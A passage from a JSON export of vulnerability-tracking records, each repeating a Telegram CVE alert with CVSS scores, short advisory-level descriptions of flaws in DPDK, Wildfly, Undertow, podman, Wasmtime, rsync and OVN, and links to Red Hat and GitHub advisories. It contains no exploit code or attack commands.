https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "38207144-c07a-48ff-a138-d73753d36180", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0220", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5486", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-02-26T11:56:36.361Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/security/cve/CVE-2024-11614\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-02-26T12:31:55.000000Z"}, {"uuid": "8d0e65ec-b031-402c-9af2-f8420b0170d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8826", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5445", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4029\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly\u2019s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.\n\ud83d\udccf Published: 2024-05-02T14:55:27.135Z\n\ud83d\udccf Modified: 2025-02-26T04:13:27.071Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8075\n2. https://access.redhat.com/errata/RHSA-2024:8076\n3. https://access.redhat.com/errata/RHSA-2024:8077\n4. https://access.redhat.com/errata/RHSA-2024:8080\n5. https://access.redhat.com/errata/RHSA-2024:8823\n6. https://access.redhat.com/errata/RHSA-2024:8824\n7. https://access.redhat.com/errata/RHSA-2024:8826\n8. https://access.redhat.com/security/cve/CVE-2024-4029\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2278615", "creation_timestamp": "2025-02-26T04:24:29.000000Z"}, {"uuid": "4a3c386f-8eef-4eb9-9e5a-61cee9aad8bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8824", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5445", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4029\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly\u2019s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.\n\ud83d\udccf Published: 2024-05-02T14:55:27.135Z\n\ud83d\udccf Modified: 2025-02-26T04:13:27.071Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8075\n2. https://access.redhat.com/errata/RHSA-2024:8076\n3. https://access.redhat.com/errata/RHSA-2024:8077\n4. https://access.redhat.com/errata/RHSA-2024:8080\n5. https://access.redhat.com/errata/RHSA-2024:8823\n6. https://access.redhat.com/errata/RHSA-2024:8824\n7. https://access.redhat.com/errata/RHSA-2024:8826\n8. https://access.redhat.com/security/cve/CVE-2024-4029\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2278615", "creation_timestamp": "2025-02-26T04:24:29.000000Z"}, {"uuid": "298a480f-73c5-4be6-b253-08002027fda5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QR6X-62GQ-4CCP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5440", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23367\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Wildfly Server Role Based Access Control (RBAC) provider. When authorization to control management operations is secured using the Role Based Access Control provider, a user without the required privileges can suspend or resume the server. A user with a Monitor or Auditor role is supposed to have only read access permissions and should not be able to suspend the server. \nThe vulnerability is caused by the Suspend and Resume handlers not performing authorization checks to validate whether the current user has the required permissions to proceed with the action.\n\ud83d\udccf Published: 2025-01-30T14:30:04.227Z\n\ud83d\udccf Modified: 2025-02-26T02:57:08.314Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2025-23367\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2337620\n3. https://github.com/advisories/GHSA-qr6x-62gq-4ccp", "creation_timestamp": "2025-02-26T03:24:38.000000Z"}, {"uuid": "d6281f1f-e015-4c9d-a39d-7554927fb0f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4884", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5443", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6162\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processed. As a result, the server may attempt to access the wrong path, causing errors such as \"404 Not Found\" or other application failures. This flaw can potentially lead to a denial of service, as legitimate resources become inaccessible due to the path mix-up.\n\ud83d\udccf Published: 2024-06-20T14:33:10.342Z\n\ud83d\udccf Modified: 2025-02-26T02:40:52.058Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1194\n2. https://access.redhat.com/errata/RHSA-2024:4386\n3. https://access.redhat.com/errata/RHSA-2024:4884\n4. https://access.redhat.com/security/cve/CVE-2024-6162\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2293069\n6. https://issues.redhat.com/browse/JBEAP-26268", "creation_timestamp": "2025-02-26T03:24:44.000000Z"}, {"uuid": "3c8d4f04-8eda-4ac9-bb24-1c61fbe182a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4392", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5446", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-02-26T04:13:19.878Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-02-26T04:24:30.000000Z"}, {"uuid": "4df6478a-3ce1-48e1-b4ee-6a6bc6d46d55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8075", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5445", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4029\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly\u2019s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.\n\ud83d\udccf Published: 2024-05-02T14:55:27.135Z\n\ud83d\udccf Modified: 2025-02-26T04:13:27.071Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8075\n2. https://access.redhat.com/errata/RHSA-2024:8076\n3. https://access.redhat.com/errata/RHSA-2024:8077\n4. https://access.redhat.com/errata/RHSA-2024:8080\n5. https://access.redhat.com/errata/RHSA-2024:8823\n6. https://access.redhat.com/errata/RHSA-2024:8824\n7. https://access.redhat.com/errata/RHSA-2024:8826\n8. https://access.redhat.com/security/cve/CVE-2024-4029\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2278615", "creation_timestamp": "2025-02-26T04:24:29.000000Z"}, {"uuid": "f9dce405-665c-48e6-af17-6d70a3bee6f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8080", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5445", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4029\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly\u2019s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.\n\ud83d\udccf Published: 2024-05-02T14:55:27.135Z\n\ud83d\udccf Modified: 2025-02-26T04:13:27.071Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8075\n2. https://access.redhat.com/errata/RHSA-2024:8076\n3. https://access.redhat.com/errata/RHSA-2024:8077\n4. https://access.redhat.com/errata/RHSA-2024:8080\n5. https://access.redhat.com/errata/RHSA-2024:8823\n6. https://access.redhat.com/errata/RHSA-2024:8824\n7. https://access.redhat.com/errata/RHSA-2024:8826\n8. https://access.redhat.com/security/cve/CVE-2024-4029\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2278615", "creation_timestamp": "2025-02-26T04:24:29.000000Z"}, {"uuid": "ae5f9c7e-875d-4419-9c12-952f403b0d97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8823", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5445", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4029\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly\u2019s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.\n\ud83d\udccf Published: 2024-05-02T14:55:27.135Z\n\ud83d\udccf Modified: 2025-02-26T04:13:27.071Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8075\n2. https://access.redhat.com/errata/RHSA-2024:8076\n3. https://access.redhat.com/errata/RHSA-2024:8077\n4. https://access.redhat.com/errata/RHSA-2024:8080\n5. https://access.redhat.com/errata/RHSA-2024:8823\n6. https://access.redhat.com/errata/RHSA-2024:8824\n7. https://access.redhat.com/errata/RHSA-2024:8826\n8. https://access.redhat.com/security/cve/CVE-2024-4029\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2278615", "creation_timestamp": "2025-02-26T04:24:29.000000Z"}, {"uuid": "24ee5f91-13ff-4711-8492-08b4c364529f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8076", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5445", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4029\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly\u2019s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.\n\ud83d\udccf Published: 2024-05-02T14:55:27.135Z\n\ud83d\udccf Modified: 2025-02-26T04:13:27.071Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8075\n2. https://access.redhat.com/errata/RHSA-2024:8076\n3. https://access.redhat.com/errata/RHSA-2024:8077\n4. https://access.redhat.com/errata/RHSA-2024:8080\n5. https://access.redhat.com/errata/RHSA-2024:8823\n6. https://access.redhat.com/errata/RHSA-2024:8824\n7. https://access.redhat.com/errata/RHSA-2024:8826\n8. https://access.redhat.com/security/cve/CVE-2024-4029\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2278615", "creation_timestamp": "2025-02-26T04:24:29.000000Z"}, {"uuid": "9590696f-7059-4ab6-abb9-373ff1a2f7ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0878", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "81ea3edb-a286-4e6e-9e14-099819c9db73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WH6W-3828-G9QF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14474", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-39393\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: Wasmtime is a standalone runtime for WebAssembly. Prior to versions 2.0.2 and 1.0.2, there is a bug in Wasmtime's implementation of its pooling instance allocator where when a linear memory is reused for another instance the initial heap snapshot of the prior instance can be visible, erroneously to the next instance. This bug has been patched and users should upgrade to Wasmtime 2.0.2 and 1.0.2. Other mitigations include disabling the pooling allocator and disabling the `memory-init-cow`.\n\ud83d\udccf Published: 2022-11-10T00:00:00.000Z\n\ud83d\udccf Modified: 2025-05-02T12:51:28.525Z\n\ud83d\udd17 References:\n1. https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-wh6w-3828-g9qf\n2. https://github.com/bytecodealliance/wasmtime/commit/2614f2e9d2d36805ead8a8da0fa0c6e0d9e428a0", "creation_timestamp": "2025-05-02T13:15:44.000000Z"}, {"uuid": "00cbb5ba-6432-422c-af25-e67ee0f98200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0849", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "7b29edda-10bf-4914-acba-74fdb22e8ed1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1084", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "6e8f2aa8-0741-4f03-9de1-8f6bf46a81b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1096", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "9d2882b6-434f-469c-8b8e-4b61a21a95ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1086", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "1f8d87af-b811-441d-a6df-8c1969466d04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1093", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "29f5b7ab-30bb-4930-a7e8-a22010d535e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1091", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: 